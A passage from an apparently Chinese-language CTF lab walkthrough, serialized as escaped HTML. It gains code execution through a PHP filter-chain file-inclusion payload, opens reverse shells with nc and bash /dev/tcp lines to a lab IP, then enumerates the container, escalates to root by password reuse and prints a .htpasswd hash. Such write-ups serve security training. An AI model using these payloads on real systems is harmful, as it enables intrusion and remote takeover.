filter\u94fe\u8fdb\u884c\u653b\u51fb\uff1a<\/p>\n<pre><code class=\"language-bash\">python3 php_filter_chain_generator.py --chain &#039;&lt;?=`$_GET[0]` ?&gt;&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\">payload&amp;0=whoami<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543102.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543102.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410152750752\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5927\u6982\u662f\u6ca1\u9519\u5427\u3002\u3002\u3002\u3002\u53cd\u5f39shell:<\/p>\n<pre><code class=\"language-bash\">payload&amp;0=nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543103.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543103.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410153009019\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">payload&amp;0=bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543104.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543104.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410153222480\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u6837\u6ca1\u5f39\u56de\u6765shell\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7f16\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">&amp;0=bash%20-c%20&#039;exec%20bash%20-i%20&amp;%3E\/dev\/tcp\/172.20.10.8\/1234%20%3C&amp;1&#039;<\/code><\/pre>\n<p>\u4e0d\u884c\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">&amp;0=id<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543105.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543105.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410153533871\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5bf9\u7279\u6b8a\u7b26\u53f7\u7f16\u7801\u4e00\u4e0b\uff1f<\/p>\n<pre><code>bash -c &#039;exec bash -i %26&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;%261&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543106.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543106.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410153711901\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543107.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543107.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410153702693\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f20\u8fc7\u6765\u4e86\uff01\uff01\uff01\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6[3-4]<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@3dbb88a289e3:\/var\/www\/html$ ls\n0bfxgh0st.html  eddiedota.html  flag.txt            gatogamer1155.jpg  onyx.html  s4vitar.html  txhaka.html  xdann1.html\n0bfxgh0st.jpg   eddiedota.jpg   gatogamer1155.html  index.php          onyx.jpg   s4vitar.jpg   txhaka.jpg   xdann1.jpg\n(remote) www-data@3dbb88a289e3:\/var\/www\/html$ cd ..;ls -la\ntotal 16\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\ndrwxr-xr-x 1 root root 4096 Feb 16  2023 html\n(remote) www-data@3dbb88a289e3:\/var\/www$ cd ..\n(remote) www-data@3dbb88a289e3:\/var$ ls -la\ntotal 56\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root  4096 Apr 10 00:40 ..\ndrwxr-xr-x 2 root root  4096 Apr 18  2022 backups\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 cache\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 lib\ndrwxrwsr-x 2 root staff 4096 Apr 18  2022 local\nlrwxrwxrwx 1 root root     9 Jan 25  2023 lock -&gt; \/run\/lock\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 log\ndrwxrwsr-x 2 root mail  4096 Jan 25  2023 mail\ndrwxr-xr-x 2 root root  4096 Jan 25  2023 opt\nlrwxrwxrwx 1 root root     4 Jan 25  2023 run -&gt; \/run\ndrwxr-xr-x 2 root root  4096 Jan 25  2023 spool\ndrwxrwxrwt 2 root root  4096 Jan 25  2023 tmp\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 www\n(remote) www-data@3dbb88a289e3:\/var$ mail\nbash: mail: command not found\n(remote) www-data@3dbb88a289e3:\/var$ cd \/home\n(remote) www-data@3dbb88a289e3:\/home$ ls\n(remote) www-data@3dbb88a289e3:\/home$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Apr 18  2022 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n(remote) www-data@3dbb88a289e3:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\n(remote) www-data@3dbb88a289e3:\/home$ cd \/tmp\n(remote) www-data@3dbb88a289e3:\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt 1 root root 4096 Apr 10 00:40 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/tmp$ cd ..\n(remote) www-data@3dbb88a289e3:\/$ ls -la\ntotal 64\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 .\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 ..\n-rwxr-xr-x   1 root root    0 Apr 10 00:40 .dockerenv\nlrwxrwxrwx   1 root root    7 Jan 25  2023 bin -&gt; usr\/bin\ndrwxr-xr-x   2 root root 4096 Apr 18  2022 boot\ndrwxr-xr-x   5 root root  360 Apr 10 00:40 dev\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 etc\ndrwxr-xr-x   2 root root 4096 Apr 18  2022 home\nlrwxrwxrwx   1 root root    7 Jan 25  2023 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root    9 Jan 25  2023 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root    9 Jan 25  2023 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root   10 Jan 25  2023 libx32 -&gt; usr\/libx32\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 media\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 mnt\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 opt\ndr-xr-xr-x 241 root root    0 Apr 10 00:40 proc\ndrwx------   1 root root 4096 Feb 16  2023 root\ndrwxr-xr-x   1 root root 4096 Feb 15  2023 run\nlrwxrwxrwx   1 root root    8 Jan 25  2023 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 srv\ndr-xr-xr-x  13 root root    0 Apr 10 00:40 sys\ndrwxrwxrwt   1 root root 4096 Apr 10 00:40 tmp\ndrwxr-xr-x   1 root root 4096 Jan 25  2023 usr\ndrwxr-xr-x   1 root root 4096 Feb 15  2023 var\n(remote) www-data@3dbb88a289e3:\/$ cd usr\/local\n(remote) www-data@3dbb88a289e3:\/usr\/local$ ls\nbin  etc  games  include  lib  man  sbin  share  src\n(remote) www-data@3dbb88a289e3:\/usr\/local$ cd share\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls\nca-certificates  man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls -la\ntotal 16\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Jan 25  2023 ..\ndrwxr-xr-x 2 root root 4096 Feb 15  2023 ca-certificates\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls -F\nca-certificates\/  man\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ cd man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ ls\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ cd ..\/ca-certificates\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ ls\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ cd \/opt\n(remote) www-data@3dbb88a289e3:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/opt$ cd ..\/mnt\n(remote) www-data@3dbb88a289e3:\/mnt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/mnt$ cd ..\n(remote) www-data@3dbb88a289e3:\/$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/var\/www\/html\/flag.txt\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/ping6\n\/usr\/bin\/ping<\/code><\/pre>\n<pre><code class=\"language-apl\">(remote) www-data@3dbb88a289e3:\/$ cat \/var\/www\/html\/flag.txt\n\n\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2003\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2580\n\u2588\u2584\u2584\u2003\u2588\u2580 \u2003\u2588\u2003\u2588\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\n\nFlag 3: HELL{LF1_F1LT7R_CH41N_G3N3R4T0R}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543108.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183108024\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\u53d1\u73b0\u53ea\u6709<code>root<\/code>\u548c<code>www-data<\/code>\u7528\u6237\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u4e4b\u524d\u5f97\u5230\u7684\u90a3\u4e2a\u767b\u5f55\u5bc6\u7801\u770b\u770b\u6709\u6ca1\u6709\u590d\u7528\uff1a<\/p>\n<pre><code class=\"language-apl\">(remote) www-data@3dbb88a289e3:\/$ su root\nPassword: \nroot@3dbb88a289e3:\/# cd \/root\nroot@3dbb88a289e3:~# ls -la\ntotal 32\ndrwx------ 1 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n-rw------- 1 root root    5 Feb 16  2023 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15  2021 .bashrc\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .local\n-rw-r--r-- 1 root root  161 Jul  9  2019 .profile\n-rw-r--r-- 1 root root  273 Feb 15  2023 .wget-hsts\n-rw-r--r-- 1 root root  272 Feb 16  2023 flag.txt\nroot@3dbb88a289e3:~# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003 \u2003\u2588\u2584 \u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580   \n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003 \u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2584\u2003 \u2003\u2588 \u2580\u2588\u2003\u2588\u2584\u2588\u2003 \u2588   \n\nFlag 4: HELL{CR3D3NT14LS_1N_HTP455WD_3H?}\n\nroot@3dbb88a289e3:~# cat .bash_history \nexit<\/code><\/pre>\n<p>\u4e0a\u4f20linpeas.sh\u3001fscan\u3001pspy64\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543109.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183740659\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>linpeas.sh<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543110.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543110.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183902700\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543112.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543112.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184018455\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">-rw-r--r-- 1 root root 45 Feb 16  2023 \/etc\/apache2\/.htpasswd\nbeilul:$apr1$fLBy4Y1e$5pVNuSbmc9kil7JulXfQW0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543113.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543113.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184054193\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543114.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543114.png\" 